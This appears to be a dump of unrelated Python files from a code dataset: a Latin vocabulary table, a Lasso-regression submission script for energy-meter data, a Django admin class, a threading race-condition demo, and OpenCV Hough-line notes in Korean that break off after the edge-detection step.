to do something (inf.)', '', '2_2', 1), ('VEL/1', 470, 'vel', 'or', '', '2_2', 1), ('VESTIS', 471, 'vestis', 'clothes, attire', '', '2_2', 1), ('VOX', 472, 'vox', 'voice', '', '2_2', 1), ('VT/4', 473, 'ut', 'that, to, in order to, so that', '', '2_2', 4), ('VVLTVS', 474, 'vultus', 'face', '', '2_2', 1), ('VXOR', 475, 'uxor', 'wife', '', '2_3', 2), ('AT/2', 476, 'at', 'but', '', '2_3', 1), ('CONIVX', 477, 'coniunx', 'spouse', '', '2_3', 1), ('DISCIPVLA', 478, 'discipula', 'student', '', '2_3', 1), ('DISCO', 479, 'disco', 'to learn', '', '2_3', 1), ('DOMINVS', 480, 'dominus', 'master, lord', '', '2_3', 1), ('FAMA', 481, 'fama', 'fame, name, reputation', '', '2_3', 1), ('FRATER', 482, 'frater', 'brother', '', '2_3', 1), ('IMPROBVS', 483, 'improbus', 'wicked, bad', '', '2_3', 1), ('IVNGO', 484, 'iungo', 'to join', '', '2_3', 1), ('MAGISTER', 485, 'magister', 'teacher', '', '2_3', 1), ('MATRIMONIVM', 486, 'matrimonium', 'marriage', '', '2_3', 1), ('NE/4', 487, 'ne', 'that not, not to, lest ', '', '2_3', 3), ('NVSQVAM', 488, 'nusquam', 'nowhere', '', '2_3', 1), ('PARIO/2', 489, 'pario', 'to give birth to', '', '2_3', 1), ('PERDO', 490, 'perdo', 'to lose, waste', '', '2_3', 1), ('SALVS', 491, 'salus', 'health, welfare', '', '2_3', 1), ('SALVTEMDICERE', 492, 'salutem', 'to greet (customary opening to letter) ', '', '2_3', 1), ('SCRIBO', 493, 'scribo', 'to write', '', '2_3', 1), ('VT/4', 494, 'ut', 'that, to, in order to, so that', '', '2_3', 4), ('VXOREMDEDVCERE', 495, 'uxorem', 'to marry a woman, to take as a wife', '', '2_3', 1), ('NEC/2', 496, 'nec', 'nor; and not', '', '2_4', 2), ('RECIPIO', 497, 'recipio', 'to take back', '', '2_4', 2), ('AGMEN', 498, 'agmen', 'marching column', '', '2_4', 1), ('APERIO', 499, 'aperio', 'to open', '', '2_4', 1), ('COEPIO', 500, 'coepi', 'to begin (w/ inf.)', '', '2_4', 1), ('DEFENDO', 501, 'defendo', 'to defend', '', '2_4', 1), ('EDO/1', 502, 'edo', 'to produce, give forth', '', '2_4', 1), ('EXTRA/2', 503, 'extra', 'outside of (w/ 
acc.)', '', '2_4', 1), ('FVRO', 504, 'furo', 'to rage, be insane', '', '2_4', 1), ('INGENS', 505, 'ingens', 'huge', '', '2_4', 1), ('INVADO/2', 506, 'invado', 'to burst in', '', '2_4', 1), ('LIGNEVS', 507, 'ligneus', 'made of wood', '', '2_4', 1), ('NEQVENEC', 508, 'neque', 'neither..nor…', '', '2_4', 1), ('PARCO', 509, 'parco', 'to spare somebody/thing (w/ dat.)', '', '2_4', 1), ('PONS', 510, 'pons', 'bridge', '', '2_4', 1), ('PORTA', 511, 'porta', 'gate', '', '2_4', 1), ('PRIMO', 512, 'primo', 'at first', '', '2_4', 1), ('QVAM/1', 513, 'quam', 'than (w/ comp. words)', '', '2_4', 2), ('QVANTVS/1', 514, 'quantus', 'how great, how much (inter. or rel. adj.)', '', '2_4', 1), ('RESISTO', 515, 'resisto', 'to resist (w/ dat.)', '', '2_4', 1), ('SIMVL/1', 516, 'simul', 'at the same time', '', '2_4', 1), ('TVTVS', 517, 'tutus', 'safe', '', '2_4', 1), ('VACVVS', 518, 'vacuus', 'empty of (w/ abl.)', '', '2_4', 1), ('VALEO', 519, 'valeo', 'to be able (w/ inf.); to be in good health', '', '2_4', 3), ('VICTOR', 520, 'victor', 'victor', '', '2_4', 1), ('VTINAM', 521, 'utinam', 'if only', '', '2_4', 2), ('BIBO/2', 522, 'bibo', 'to drink', '', '2_5', 1), ('CARMEN/1', 523, 'carmen', 'song, poem', '', '2_5', 1), ('CIBVS', 524, 'cibus', 'food', '', '2_5', 1), ('DVLCIS', 525, 'dulcis', 'sweet', '', '2_5', 1), ('FLVMEN', 526, 'flumen', 'river', '', '2_5', 1), ('IMMEMOR', 527, 'immemor', 'forgetful of (w/ gen.)', '', '2_5', 1), ('IOCVS', 528, 'iocus', 'joke', '', '2_5', 1), ('IVVENTVS', 529, 'iuventus', 'youth', '', '2_5', 1), ('LEVIS/1', 530, 'levis', 'light', '', '2_5', 1), ('MENS', 531, 'mens', 'mind, spirit', '', '2_5', 1), ('NE/4', 532, 'ne', 'that not, not to, lest ', '', '2_5', 3), ('ORO', 533, 'oro', 'to ask, entreat', '', '2_5', 1), ('PLACEO', 534, 'placeo', 'to please, be agreeable to somebody', '', '2_5', 1), ('PROXIMVS/2', 535, 'proximus', 'nearest', '', '2_5', 1), ('TAMQVAM/2', 536, 'tam', 'so…as…', '', '2_5', 1), ('VEHEMENS', 537, 'vehemens', 'violent, vehement', '', 
'2_5', 1), ('VETVS', 538, 'vetus', 'old', '', '2_5', 1), ('VINVM', 539, 'vinum', 'wine', '', '2_5', 1), ('VIRTVS', 540, 'virtus', 'courage, virtue', '', '2_5', 1), ('VITIVM', 541, 'vitium', 'vice', '', '2_5', 1), ('VT/4', 542, 'ut', 'that, to, in order to, so that', '', '2_5', 4), ('PATER', 543, 'pater', 'father', '', '2_6', 2), ('DECIPIO', 544, 'decipio', 'to deceive', '', '2_6', 1), ('DILIGO/3', 545, 'diligo', 'to love, esteem highly', '', '2_6', 1), ('DVO', 546, 'duo', 'two', '', '2_6', 1), ('EXERCITVS/1', 547, 'exercitus', 'army', '', '2_6', 1), ('FIDELIS/2', 548, 'fidelis', 'faithful, loyal', '', '2_6', 1), ('HERES', 549, 'heres', 'heir', '', '2_6', 1), ('IMPERIVM', 550, 'imperium', 'rule, empire, power', '', '2_6', 1), ('INOPIA', 551, 'inopia', 'helplessness, want', '', '2_6', 1), ('LAVDO', 552, 'laudo', 'to praise', '', '2_6', 1), ('NECESSEEST', 553, 'necesse', 'it is necessary for someone (dat.) to do something (inf.)', '', '2_6', 1), ('NEMO', 554, 'nemo', 'no one', '', '2_6', 1), ('PAVLO', 555, 'paulo', 'a little bit, to a small extent', '', '2_6', 1), ('QVAM/1', 556, 'quam', 'than (w/ comp. 
words)', '', '2_6', 2), ('QVANTVM/3', 557, 'quantum', 'to what extent, how much', '', '2_6', 1), ('RESTITVO', 558, 'restituo', 'to restore', '', '2_6', 1), ('SATIS/2', 559, 'satis', 'enough, sufficiently', '', '2_6', 1), ('SECVNDVS/1', 560, 'secundus', 'second', '', '2_6', 1), ('TERTIVS', 561, 'tertius', 'third', '', '2_6', 1), ('TRES', 562, 'tres', 'three', '', '2_6', 1), ('TRISTIS', 563, 'tristis', 'sad', '', '2_6', 1), ('VEHEMENTER', 564, 'vehementer', 'strongly, vehemently', '', '2_6', 1), ('NOLO', 565, 'nolo', 'not to want, to be unwilling', '', '2_7', 2), ('AETAS', 566, 'aetas', 'age', '', '2_7', 1), ('FIDES/2', 567, 'fides', 'faith', '', '2_7', 1), ('FVNDO/2', 568, 'fundo', 'to pour', '', '2_7', 1), ('GLORIA', 569, 'gloria', 'glory', '', '2_7', 1), ('LIBERTAS', 570, 'libertas', 'freedom', '', '2_7', 1), ('LVMEN', 571, 'lumen', 'light', '', '2_7', 1), ('MALO', 572, 'malo', 'to prefer', '', '2_7', 1), ('ORNATVS/1', 573, 'ornatus', 'adorned, ornate, elaborate', '', '2_7', 1), ('OTIVM', 574, 'otium', 'leisure, free time', '', '2_7', 1), ('POTENS', 575, 'potens', 'powerful', '', '2_7', 1), ('PVBLICVS/2', 576, 'publicus', 'common', '', '2_7', 1), ('QVALIS/1', 577, 'qualis', 'what sort of? (inter. adj.)', '', '2_7', 1), ('RESPVBLICA', 578, 'res', 'state', '', '2_7', 1), ('STVDIOSVS', 579, 'studiosus', 'fond of (w/ gen.)', '', '2_7', 1), ('TAMQVAM/1', 580, 'tamquam', 'as', '', '2_7', 1), ('TOT', 581, 'tot', 'so many', '', '2_7', 1), ('TRAHO', 582, 'traho', 'to drag, draw', '', '2_7', 1), ('VBI/1', 583, 'ubi', 'where? (inter. 
adv)', '', '2_7', 1), ('VIX', 584, 'vix', 'hardly', '', '2_7', 1), ('VNVS', 585, 'unus', 'one', '', '2_7', 1), ('VOLO/3', 586, 'volo', 'to want', '', '2_7', 1), ('VTILIS', 587, 'utilis', 'useful', '', '2_7', 1), ('ADHVC', 588, 'adhuc', 'still, up to this time', '', '2_8', 1), ('ANTIQVVS', 589, 'antiquus', 'ancient', '', '2_8', 1), ('ARS', 590, 'ars', 'science, art, skill', '', '2_8', 1), ('DOMINOR', 591, 'dominor', 'to dominate, rule', '', '2_8', 1), ('HORTOR', 592, 'hortor', 'to exhort, urge', '', '2_8', 1), ('LATINE', 593, 'Latine', 'in Latin', '', '2_8', 1), ('LATINVS/A', 594, 'Latinus', 'Latin, pertaining to Latin', '', '2_8', 1), ('LINGVA', 595, 'lingua', 'language; tongue', '', '2_8', 1), ('LOQVOR', 596, 'loquor', 'to speak', '', '2_8', 1), ('MAGIS/2', 597, 'magis', 'more', '', '2_8', 1), ('MAIOR', 598, 'maior', 'bigger; greater', '', '2_8', 1), ('MAXIMVS', 599, 'maximus', 'greatest', '', '2_8', 1), ('MELIOR', 600, 'melior', 'better', '', '2_8', 1), ('MINIMVS', 601, 'minimus', 'smallest', '', '2_8', 1), ('MINVS', 602, 'minus', 'less', '', '2_8', 2), ('OPTIMVS', 603, 'optimus', 'best', '', '2_8', 1), ('PARTIOR', 604, 'partior', 'to divide, distribute', '', '2_8', 1), ('PATIOR', 605, 'patior', 'to endure, tolerate, suffer', '', '2_8', 1), ('PEIOR', 606, 'peior', 'worse', '', '2_8', 1), ('PESSIMVS', 607, 'pessimus', 'worst', '', '2_8', 1), ('PLVRIMVS', 608, 'plurimus', 'most', '', '2_8', 1), ('PLVS', 609, 'plus', 'more', '', '2_8', 1), ('SEQVOR', 610, 'sequor', 'to follow', '', '2_8', 1), ('VEREOR', 611, 'vereor', 'to fear, respect', '', '2_8', 1), ('ADDO', 612, 'addo', 'to add', '', '2_9', 1), ('AVRIS', 613, 'auris', 'ear', '', '2_9', 1), ('CONOR', 614, 'conor', 'to try', '', '2_9', 1), ('DEMITTO', 615, 'demitto', 'to send down', '', '2_9', 1), ('DISSIMILIS', 616, 'dissimilis', 'dissimilar ', '', '2_9', 1), ('FACILIS', 617, 'facilis', 'easy', '', '2_9', 1), ('FERO', 618, 'fero', 'to carry, bear', '', '2_9', 1), ('FIO', 619, 'fio', 'to be made, become; 
(impersonally) to happen', '', '2_9', 1), ('FRIGVS', 620, 'frigus', 'cold', '', '2_9', 1), ('GENVS/1', 621, 'genus', 'kind', '', '2_9', 1), ('GLACIES', 622, 'glacies', 'ice', '', '2_9', 1), ('GRACILIS', 623, 'gracilis', 'slender', '', '2_9', 1), ('HVMILIS', 624, 'humilis', 'low, humble', '', '2_9', 1), ('ITER', 625, 'iter', 'road, trip ', '', '2_9', 1), ('LABOR/2', 626, 'labor', 'to slide, slip, glide down', '', '2_9', 1), ('MODEROR', 627, 'moderor', 'to manage, direct, guide', '', '2_9', 1), ('NIX', 628, 'nix', 'snow', '', '2_9', 1), ('ONVS', 629, 'onus', 'weight, burden', '', '2_9', 1), ('PERVENIO', 630, 'pervenio', 'to arrive', '', '2_9', 1), ('PROGREDIOR', 631, 'progredior', 'to go forward, proceed', '', '2_9', 1), ('QVOTIENS/2', 632, 'quotiens', 'as often as', '', '2_9', 1), ('SIMVLAC/2', 633, 'simulac', 'as soon as', '', '2_9', 1), ('SVVS', 634, 'suus', 'his, her, its, their', '', '2_10', 2), ('AEDES', 635, 'aedes', 'temple; pl. dwelling, house', '', '2_10', 1), ('EO/1', 636, 'eo', 'to go ', '', '2_10', 1), ('IVCVNDVS', 637, 'iucundus', 'pleasant, nice', '', '2_10', 1), ('LABOR/1', 638, 'labor', 'labor, toil', '', '2_10', 1), ('LAEDO', 639, 'laedo', 'to harm', '', '2_10', 1), ('LIBER/2', 640, 'liber', 'free', '', '2_10', 1), ('LVCRVM', 641, 'lucrum', 'profit, gain', '', '2_10', 1), ('MARITIMVS', 642, 'maritimus', 'maritime', '', '2_10', 1), ('MODVS', 643, 'modus', 'way, method, manner', '', '2_10', 1), ('PAVLISPER', 644, 'paulisper', 'for a little while', '', '2_10', 1), ('PECVNIA', 645, 'pecunia', 'money', '', '2_10', 1), ('PLACIDVS', 646, 'placidus', 'peaceful, calm', '', '2_10', 1), ('POTIVS', 647, 'potius', 'rather', '', '2_10', 1), ('PROSPER', 648, 'prosper', 'fortunate, prosperous', '', '2_10', 1), ('REDDO', 649, 'reddo', 'to give back', '', '2_10', 1), ('SARCINA', 650, 'sarcina', 'burden, baggage', '', '2_10', 1), ('SCELESTVS', 651, 'scelestus', 'wicked', '', '2_10', 1), ('SEMEL', 652, 'semel', 'once', '', '2_10', 1), ('SERENVS', 653, 'serenus', 'calm, 
clear', '', '2_10', 1), ('PARVM/2', 654, 'parum', 'too little', '', '2_11', 2), ('ALTER', 655, 'alter', 'the other (of two)', '', '2_11', 1), ('GEMMA', 656, 'gemma', 'gem, precious stone', '', '2_11', 1), ('LEGATVS', 657, 'legatus', 'ambassador', '', '2_11', 1), ('MAGNIHABEO', 658, 'magni', 'to esteem a lot', '', '2_11', 1), ('MINVS', 659, 'minus', 'less', '', '2_11', 2), ('NESCIO', 660, 'nescio', 'not to know', '', '2_11', 1), ('NEVTER', 661, 'neuter', 'neither, none (of two)', '', '2_11', 1), ('NVLLVS', 662, 'nullus', 'none', '', '2_11', 1), ('OPERAEPRETIVMEST', 663, 'operae', 'it is worthwhile', '', '2_11', 1), ('POPVLVS/1', 664, 'populus', 'a people, populace', '', '2_11', 1), ('QVOMODO/1', 665, 'quomodo', 'how', '', '2_11', 1), ('SALVTO', 666, 'saluto', 'to greet ', '', '2_11', 1), ('SERVVS/1', 667, 'servus', 'slave, servant', '', '2_11', 1), ('SOLVS', 668, 'solus', 'alone, only', '', '2_11', 1), ('SPECTO', 669, 'specto', 'to watch', '', '2_11', 1), ('TACEO', 670, 'taceo', 'to be silent, keep quiet', '', '2_11', 1), ('TOTVS', 671, 'totus', 'whole, entire', '', '2_11', 1), ('TVRPIS', 672, 'turpis', 'shameful, disgraceful', '', '2_11', 1), ('VTER/4', 673, 'uter', 'who, which (of two)?', '', '2_11', 1), ('VTOR', 674, 'utor', 'to use (w/ abl.)', '', '2_11', 1), ('CVM/3', 675, 'cum', 'when, after', '', '2_12', 2), ('INQVIO', 676, 'inquam', 'to say (used with direct speech)', '', '2_12', 3), ('TAMEN', 677, 'tamen', 'however', '', '2_12', 2), ('CARVS', 678, 'carus', 'dear', '', '2_12', 1), ('INSVLA', 679, 'insula', 'island', '', '2_12', 2), ('MORIOR', 680, 'morior', 'to die', '', '2_12', 1), ('NIMIS', 681, 'nimis', 'too much', '', '2_12', 1), ('NISI', 682, 'nisi', 'if not, unless', '', '2_12', 1), ('OFFICIVM', 683, 'officium', 'duty', '', '2_12', 1), ('ORBIS', 684, 'orbis', 'circle', '', '2_12', 1), ('ORBISTERRARVM', 685, 'orbis', 'the earth, the world', '', '2_12', 1), ('PROBO', 686, 'probo', 'to approve ', '', '2_12', 1), ('QVAMQVAM/2', 687, 'quamquam', 'although', 
'', '2_12', 1), ('QVAMVIS/1', 688, 'quamvis', 'although', '', '2_12', 1), ('QVIA', 689, 'quia', 'because', '', '2_12', 1), ('QVIDEM', 690, 'quidem', 'indeed', '', '2_12', 1), ('QVOD/1', 691, 'quod', 'because', '', '2_12', 1), ('SENTENTIA', 692, 'sententia', 'opinion, point of view', '', '2_12', 1), ('SORS', 693, 'sors', 'lot', '', '2_12', 1), ('SPERO', 694, 'spero', 'to hope', '', '2_12', 1), ('SPES', 695, 'spes', 'hope', '', '2_12', 1), ('ATQVE/1', 696, 'atque', 'as', '', '2_13', 2), ('ABSENS', 697, 'absens', 'away, absent', '', '2_13', 1), ('ABSVM/1', 698, 'absum', 'to be away', '', '2_13', 1), ('BENEVOLENTIA', 699, 'benevolentia', 'good will', '', '2_13', 1), ('DECLARO', 700, 'declaro', 'to demonstrate, show, make known, reveal', '', '2_13', 1), ('IDEM', 701, 'idem', 'the same', '', '2_13', 1), ('IPSE', 702, 'ipse', 'self', '', '2_13', 1), ('IRASCOR', 703, 'irascor', 'to be angry at (w/ dat.)', '', '2_13', 1), ('ISTE', 704, 'iste', 'that (of yours)', '', '2_13', 1), ('MIROR', 705, 'miror', 'to marvel, be surprised at', '', '2_13', 1), ('MVLTITVDO', 706, 'multitudo', 'crowd, throng', '', '2_13', 1), ('NEGO', 707, 'nego', 'to deny ', '', '2_13', 1), ('NVMERO/1', 708, 'numero', 'to number, count among', '', '2_13', 1), ('OFFENDO', 709, 'offendo', ']to happen upon, offend', '', '2_13', 1), ('REDEO/1', 710, 'redeo', 'to go back, return', '', '2_13', 1), ('REFERO', 711, 'refero', 'to carry back, report', '', '2_13', 1), ('SOCIVS/1', 712, 'socius', 'associate, partner, ally', '', '2_13', 1), ('TALIS', 713, 'talis', 'such a', '', '2_13', 1), ('TVRRIS', 714, 'turris', 'tower', '', '2_13', 1), ('VENIA', 715, 'venia', 'pardon, indulgence, forgiveness', '', '2_13', 1), ('VERSOR', 716, 'versor', 'to be situated in, be occupied in ', '', '2_13', 1), ('VIRGA', 717, 'virga', 'twig, stick', '', '2_13', 1), ('VOLVNTAS', 718, 'voluntas', 'will', '', '2_13', 1), ('AFFIRMO', 719, 'affirmo', 'to assert, maintain', '', '2_14', 1), ('CIRCVMEO/1', 720, 'circumeo', 'to go around', '', 
'2_14', 1), ('CONTINEO', 721, 'contineo', 'to hold, keep together, contain', '', '2_14', 1), ('COTIDIANVS', 722, 'cottidianus', 'of every day, daily', '', '2_14', 1), ('ELEMENTVM', 723, 'elementum', 'element', '', '2_14', 1), ('ERGO/2', 724, 'ergo', 'therefore', '', '2_14', 1), ('GRAVITAS', 725, 'gravitas', 'weight, gravity', '', '2_14', 1), ('IMMENSVS', 726, 'immensus', 'immeasurable, immense, endless', '', '2_14', 1), ('INFINITVS', 727, 'infinitus', 'boundless, unlimited', '', '2_14', 1), ('MAXIME', 728, 'maxime', 'most', '', '2_14', 1), ('MEDIVS', 729, 'medius', 'middle', '', '2_14', 1), ('MOTVS', 730, 'motus', 'motion, movement', '', '2_14', 1), ('MVLTO/2', 731, 'multo', 'by much', '', '2_14', 1), ('NATVRA', 732, 'natura', 'nature', '', '2_14', 1), ('NECESSARIO', 733, 'necessario', 'necessarily', '', '2_14', 1), ('PERPERAM', 734, 'perperam', 'wrongly, incorrectly', '', '2_14', 1), ('PONDVS', 735, 'pondus', 'weight', '', '2_14', 1), ('PRAESERTIM', 736, 'praesertim', 'especially', '', '2_14', 1), ('QVIES', 737, 'quies', 'rest, repose', '', '2_14', 1), ('VNDIQVE', 738, 'undique', 'from all parts, from everywhere', '', '2_14', 1), ('VOLVO', 739, 'volvo', 'to turn round', '', '2_14', 1), ('VT/4', 740, 'ut', 'that, to, in order to, so that', '', '2_14', 4), ('ANIMADVERTO', 741, 'animadverto', 'to notice', '', '2_15', 1), ('APPROPINQVO', 742, 'appropinquo', 'to approach (w/ dat or ad + acc.)', '', '2_15', 1), ('CERNO', 743, 'cerno', 'to see, distinguish with the eyes', '', '2_15', 1), ('CIRCA/2', 744, 'circa', 'around (w/ acc.)', '', '2_15', 1), ('CLAMO', 745, 'clamo', 'to shout, scream', '', '2_15', 1), ('FINGO', 746, 'fingo', 'to imagine, form in the mind', '', '2_15', 1), ('IMPINGO', 747, 'impingo', 'to push, strike, inflict', '', '2_15', 1), ('INFLIGO', 748, 'infligo', 'to strike on or against, inflict', '', '2_15', 1), ('ITERVM', 749, 'iterum', 'again', '', '2_15', 1), ('OPPIDVM', 750, 'oppidum', 'town', '', '2_15', 1), ('PERCVTIO', 751, 'percutio', 'to strike 
through ', '', '2_15', 1), ('PRAEDITVS', 752, 'praeditus', 'endowed with, possessed of (w/ abl.)', '', '2_15', 1), ('REPELLO', 753, 'repello', 'to push back, thrust back', '', '2_15', 1), ('RIDEO', 754, 'rideo', 'to laugh', '', '2_15', 1), ('RVMPO', 755, 'rumpo', 'to break, tear', '', '2_15', 1), ('SEDES', 756, 'sedes', 'seat, abode', '', '2_15', 1), ('SIC', 757, 'sic', 'in such a way', '', '2_15', 1), ('SIDVS', 758, 'sidus', 'constellation', '', '2_15', 1), ('TELVM', 759, 'telum', 'spear, javelin', '', '2_15', 1), ('VEHO', 760, 'veho', 'to drive, carry', '', '2_15', 1)]
# Maps each section id to the id of the section that precedes it, forming a
# reverse linked list over the book's reading order ('start' is the sentinel
# head; 'end' points at the final section, 2.15).
section_list ={'1.1': 'start', '1.2': '1.1', '1.3': '1.2', '1.4': '1.3', '1.5': '1.4', '1.6': '1.5', '1.7': '1.6', '1.8': '1.7', '1.9': '1.8', '1.10': '1.9', '1.11': '1.10', '1.12': '1.11', '1.13': '1.12', '1.14': '1.13', '1.15': '1.14', '1.16': '1.15', '1.17': '1.16', '1.18': '1.17', '1.19': '1.18', '1.20': '1.19', '1.21': '1.20', '2.1': '1.21', '2.2': '2.1', '2.3': '2.2', '2.4': '2.3', '2.5': '2.4', '2.6': '2.5', '2.7': '2.6', '2.8': '2.7', '2.9': '2.8', '2.10': '2.9', '2.11': '2.10', '2.12': '2.11', '2.13': '2.12', '2.14': '2.13', '2.15': '2.14', 'end': '2.15', 'start': 'start'}
# Human-readable book title.
title = "Latin for the New Millennium Vols 1 and 2 (Tunberg-Minkova)"
# Depth of the section numbering (volume.section -> two levels).
section_level = 2
language = "Latin"
# NOTE(review): section_words and the_text are presumably defined earlier in
# this generated file; the meaning of the trailing True/False flags to
# text.Text is not visible here — confirm against the text module.
book = text.Text(title, section_words, the_text, section_list, section_level, language, True, False)
9,531 | 6028b46eab422dea02af24e9cf724fe0d8b3ecc4 | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GroupKFold
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_log_error
from sklearn.preprocessing import OneHotEncoder
from sklearn.linear_model import Lasso
def test_lasso():
    """Load and preprocess the competition test set for the Lasso model.

    Mirrors the training-set preprocessing: merges building metadata and
    weather data, engineers time features, interpolates missing values,
    keeps only the late-evening hours (22-23), and one-hot encodes the
    categorical variables.

    Returns:
        pd.DataFrame: feature matrix indexed by ``row_id``, ready to be
        passed to ``mod_lasso.predict``.
    """
    test = pd.read_csv('./data/test.csv')
    building_metadata = pd.read_csv('./data/building_metadata.csv')
    weather_test = pd.read_csv('./data/weather_test.csv')
    # Sort so that the interpolation below fills values along each
    # building's own time series.
    test.sort_values(by=['building_id', 'timestamp'], inplace=True)
    # Merge building metadata and weather readings onto the meter rows.
    test = (test
            .merge(building_metadata, on='building_id', how='left')
            .merge(weather_test, on=['site_id', 'timestamp'], how='left'))
    del building_metadata
    del weather_test
    # Add date-derived features.
    test['timestamp'] = pd.to_datetime(test['timestamp'])
    test['hour'] = test.timestamp.dt.hour
    test['wday'] = test.timestamp.dt.dayofweek
    # Series.dt.weekofyear is deprecated (removed in pandas 2.0);
    # isocalendar().week is the supported equivalent (cast back to int64
    # to match the original dtype).
    test['week'] = test.timestamp.dt.isocalendar().week.astype('int64')
    # Eliminate problematic variables.
    test.drop(['timestamp', 'year_built', 'floor_count', 'cloud_coverage', 'site_id', 'primary_use', 'wind_direction', 'square_feet', 'dew_temperature', 'sea_level_pressure', 'wind_speed', 'precip_depth_1_hr'], inplace=True, axis=1)
    # Imputation.
    test = test.interpolate()
    # Keep only hours 22 and 23: one vectorized drop replaces the original
    # 22 separate drop calls (one per hour 0..21).
    test.drop(test[test.hour <= 21].index, inplace=True)
    # One-hot encoding of building_id and meter.
    encode = OneHotEncoder(categories='auto', drop='first')
    catego_var = test.loc[:, ['building_id', 'meter']].to_numpy()
    catego_var = encode.fit_transform(catego_var).toarray()
    # NOTE(review): this assumes unique() appearance order matches the
    # sorted category order used by OneHotEncoder; it holds because the
    # frame was sorted by building_id above — confirm if the sort changes.
    encode_names = test.building_id.unique().tolist()[1:] + ['meter_1', 'meter_2', 'meter_3']
    encode_var = pd.DataFrame(catego_var, columns=encode_names)
    test.drop('meter', inplace=True, axis=1)
    test.reset_index(drop=True, inplace=True)
    test = test.join(encode_var)
    # Use row_id as the index so predictions align with the submission.
    test.set_index('row_id', inplace=True)
    return test
# Training was done in a previous run; the fitted model was persisted with
# joblib and is only loaded here for inference.
#X_train, y_train = train_lasso()
#mod_lasso = Lasso()
#mod_lasso.fit(X_train, y_train)
#print(mod_lasso.coef_)

from joblib import dump, load

# Load the pre-trained Lasso model and score the preprocessed test set.
mod_lasso = load('mod_lasso.joblib')
X_test = test_lasso()
y_pred = mod_lasso.predict(X_test)
print(X_test.head())
# Meter readings cannot be negative, so clip predictions at zero before
# writing the submission file (indexed by row_id, as required).
sub = pd.DataFrame(np.maximum(0,y_pred), index = X_test.index, columns = ['meter_reading'])
sub.sort_values(by = 'row_id', inplace = True)
sub.to_csv('./submission12.csv')
9,532 | 821afa85eb783b4bf1018800f598a3294c4cbcfb | from django.contrib import admin
# Register your models here.
from registration.models import FbAuth
class AllFieldsAdmin(admin.ModelAdmin):
    """
    A model admin that displays all fields in admin except many-to-many
    and the pk field.
    """
    def __init__(self, model, admin_site):
        # model._meta.fields already excludes many-to-many relations; we
        # additionally drop the implicit "id" primary-key column.
        self.list_display = [field.name for field in model._meta.fields
                             if field.name not in ["id"]]
        super(AllFieldsAdmin, self).__init__(model, admin_site)
# Register FbAuth with the custom admin so every non-pk field shows in the
# changelist; previously AllFieldsAdmin was defined but never used.
admin.site.register(FbAuth, AllFieldsAdmin)
9,533 | 15e0b396a4726f98ce5ae2620338d7d48985707e | try:
fh = open("testfile","w")
fh.write("test")
except IOError:
print("Error:没有找到文件")
else:
print("sucess")
fh.close()
|
9,534 | 60079005c2091d2dc0b76fb71739671873f0e0f1 | import threading
import time
# Shared counter that both worker threads mutate without a lock — the
# whole point of this demo is the resulting lost-update race.
g_num = 0


def work1(num):
    """Increment the shared global counter ``num`` times, then report it."""
    global g_num
    for _ in range(num):
        g_num += 1
    print("__in work1: g_num is {}".format(g_num))
def work2(num):
    """Increment the shared global counter ``num`` times, then report it."""
    global g_num
    for _ in range(num):
        g_num += 1
    print("__in work2: g_num is {}".format(g_num))
def main():
    """Start two threads that race on ``g_num``, wait, and print the result.

    Because ``g_num += 1`` in work1/work2 is not atomic and unprotected,
    updates are lost and the final value is usually below 2 * num — that
    lost-update race is what this demo illustrates.
    """
    print("__线程创建之前g_num is {}".format(g_num))
    # num = 100 or 10000000
    # Bug fix: the previous value 10000000000 (1e10) had extra zeros and
    # made the demo run for hours; 1e7 already shows the race reliably.
    num = 10000000
    t1 = threading.Thread(target=work1, args=(num,))
    t1.start()
    t2 = threading.Thread(target=work2, args=(num,))
    t2.start()
    # Poll until only the main thread remains, i.e. both workers finished.
    while len(threading.enumerate()) != 1:
        time.sleep(1)
    print("2个线程对同一个全局变量操作之后的最终结果是:{}".format(g_num))


if __name__ == "__main__":
    main()
|
9,535 | ff7cb8261f3abb70599725fe7c598c571d037226 | ## 허프변환에 의한 직선 검출
# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min-theta=None, max-theta=None) => lines
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# rho, theta 값이 커지면 축적배열의 크기는 작아지고, 값이 작으면 축적배열은 커진다.
# 축적배열이 크면 정교한 직선을 표현할 수 있으나, 연산량이 많아진다.
# 축적배열이 작아면 정밀한 직선을 표현할 수 없으나, 연산량이 적어 속도는 빠르다.
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : rho, theta 값을 담고 있는 3차원 행렬(numpy.ndarray) 형태로 리턴된다.
# rho, theta를 행렬로 표현한다고 하면 rho, theta 2개만 있으면 되는데
# c++에서 파이썬으로 넘어오면서 쓸데없는 값이 추가되었다.
# lines 의 shape은 (N, 1, 2), dtype = numpy.float32 **shape 주의할 것
# 가운데 1이 의미없는 값. 그래서 나중에 코드화할 때 [0]을 집어넣으면 된다.
# rho, theta값은 우리가 알아보기 힘들다.
## 확률적 허프 변환
# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : 선분의 시작과 끝 좌표(x1, y1, x2, y2) 정보를 담고 있는 numpy.ndarray
# shape=(N, 1, 4), dtype = numpy.int32
# minLineLength : 검출하기 위한 선분의 최소 길이. (최소길이에 못미치면 검출X)
# maxLineGap : 직선으로 간주하기 위한 최대 에지 점 간격. 기본값 0
# 기본값이 0일 때는, _ _ 이렇게 에지에 간격이 있으면 하나의 직선으로 보지 않고,
# 이 값을 4로 줬을 때는, __ _ __ ___ 이렇게 간격이 3개 있어도 하나의 직선으로 본다.
# Demo: detect line segments with the probabilistic Hough transform and
# draw them in green on top of the Canny edge image.
import sys, cv2, numpy as np
# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)
src = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)
if src is None:
    print('Image load failed')
    sys.exit()
edges = cv2.Canny(src, 50, 150)
